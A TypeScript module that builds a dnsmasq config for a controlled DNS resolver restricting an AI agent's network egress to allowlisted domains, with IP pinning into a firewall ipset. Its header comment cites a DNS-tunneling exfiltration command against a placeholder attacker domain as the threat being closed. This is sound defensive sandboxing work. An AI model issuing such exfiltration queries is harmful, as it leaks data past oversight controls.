/**
 * Egress DNS — Tier B controlled-resolver config (docs/172 Gap 1, SHI-90).
 *
 * Tier A leaves DNS open (port 53 to anywhere), so DNS-tunneling exfil
 * (`dig data.attacker.com`) still works and the ipset can go stale as CDN IPs
 * rotate. Tier B closes both with a **controlled resolver** (dnsmasq) that runs
 * in the agent's netns and is the ONLY resolver the agent can reach:
 *
 *   - It forwards ONLY allowlisted domains to a real upstream; every other name
 *     gets no answer and is never forwarded — so an exfil query to an attacker
 *     nameserver is dropped at the resolver, not just unrouted.
 *   - For each allowlisted domain it pins the resolved IPs into the Tier A ipset
 *     (`dnsmasq --ipset`), so whatever the agent just resolved is exactly what
 *     the firewall now permits — no stale-IP breakage.
 *
 * This is the "prefer battle-tested primitives over custom security code"
 * principle (plan.md): dnsmasq's `ipset` integration is purpose-built for
 * resolve-and-pin, so we don't hand-roll a DNS server.
 *
 * This module owns the **config generation** (pure, unit-tested). The resolver
 * process, the netns sidecar, the resolv.conf wiring, and the iptables DNS-lock
 * rules are orchestration/bash verified on a live host (the SHI-90 Tier B
 * checklist), not in unit tests.
 */

import { normalizeHost } from "./egress-allowlist.js";

/** ipset names the Tier A installer creates; dnsmasq pins resolved IPs into them. */
export const EGRESS_IPSET_V4 = "shipit-egress-allow4";
export const EGRESS_IPSET_V6 = "shipit-egress-allow6";

/**
 * Uid dnsmasq drops to inside the resolver sidecar (created in the image). The
 * iptables DNS-lock rules allow port-53 egress ONLY for this uid (the resolver's
 * own upstream queries) — the agent (uid 1000, SHI-31) reaching any resolver but
 * the in-netns dnsmasq is dropped. Must differ from the agent uid.
 */
export const EGRESS_RESOLVER_UID = 911;
export const EGRESS_RESOLVER_USER = "egressdns";

/** Loopback address the resolver listens on; the agent's resolv.conf points here. */
export const EGRESS_RESOLVER_LISTEN = "127.0.0.1";

/** Docker's embedded DNS, used as upstream for internal (compose/orchestrator) names. */
export const DOCKER_EMBEDDED_DNS = "127.0.0.11";

/** Convert an allowlist entry (suffix `.x.com` or exact `x.com`) to a dnsmasq domain. */
export function allowlistEntryToDomain(entry: string): string {
  const h = normalizeHost(entry);
  return h.startsWith(".") ? h.slice(1) : h;
}

export interface DnsmasqConfigOpts {
  /**
   * Allowlisted PUBLIC domains (dnsmasq matches a domain AND its subdomains).
   * Derived from the egress allowlist entries via {@link allowlistEntryToDomain}.
   */
  publicDomains: string[];
  /** Public upstream resolver(s) for allowlisted domains (e.g. ["1.1.1.1"]). */
  publicUpstreams: string[];
  /**
   * Internal names the agent must still resolve (the orchestrator host; compose
   * service names) — forwarded to Docker's embedded DNS. NOT pinned to the ipset
   * (they're on the bridge subnet the Tier A firewall already allows by IP).
   */
  internalDomains?: string[];
  ipsetV4?: string;
  ipsetV6?: string;
  resolverUser?: string;
  listenAddress?: string;
  dockerDns?: string;
}

/**
 * Build the dnsmasq config for the Tier B resolver. The critical property:
 * **no default upstream** (`no-resolv` + only per-domain `server=` lines), so a
 * name that matches neither the public allowlist nor the internal list is
 * refused — closing DNS tunneling. Allowlisted public domains additionally get
 * an `ipset=` line so their resolved IPs are pinned into the egress firewall set.
 */
export function buildDnsmasqConfig(opts: DnsmasqConfigOpts): string {
  const ipsetV4 = opts.ipsetV4 ?? EGRESS_IPSET_V4;
  const ipsetV6 = opts.ipsetV6 ?? EGRESS_IPSET_V6;
  const user = opts.resolverUser ?? EGRESS_RESOLVER_USER;
  const listen = opts.listenAddress ?? EGRESS_RESOLVER_LISTEN;
  const dockerDns = opts.dockerDns ?? DOCKER_EMBEDDED_DNS;

  const publicDomains = dedupe(opts.publicDomains.map(allowlistEntryToDomain).filter(Boolean));
  const internalDomains = dedupe((opts.internalDomains ?? []).map(normalizeHost).filter(Boolean));
  const upstreams = opts.publicUpstreams.filter(Boolean);
  if (upstreams.length === 0) throw new Error("buildDnsmasqConfig: at least one public upstream is required");

  const lines: string[] = [
    "# Generated by ShipIt egress Tier B (docs/172 Gap 1, SHI-90). Do not edit.",
    "no-resolv", // never read /etc/resolv.conf (it points back at us — circular)
    "no-hosts",
    "bind-interfaces",
    `listen-address=${listen}`,
    "port=53",
    `user=${user}`, // drop privileges to the uid the firewall owner-match allows
    "cache-size=1000",
    "",
    "# Allowlisted PUBLIC domains: forward to the upstream AND pin resolved IPs",
    "# into the egress firewall ipset (resolve-and-pin → no stale-IP breakage).",
  ];
  for (const domain of publicDomains) {
    for (const up of upstreams) lines.push(`server=/${domain}/${up}`);
    lines.push(`ipset=/${domain}/${ipsetV4},${ipsetV6}`);
  }
  if (internalDomains.length > 0) {
    lines.push("", "# Internal names → Docker embedded DNS (reached by IP via the bridge allow).");
    for (const domain of internalDomains) lines.push(`server=/${domain}/${dockerDns}`);
  }
  lines.push(
    "",
    "# No default server: any name matching neither list is REFUSED — this is",
    "# what closes DNS-tunneling exfil (the query is never forwarded anywhere).",
    "",
  );
  return lines.join("\n");
}

function dedupe(xs: string[]): string[] {
  return [...new Set(xs)];
}
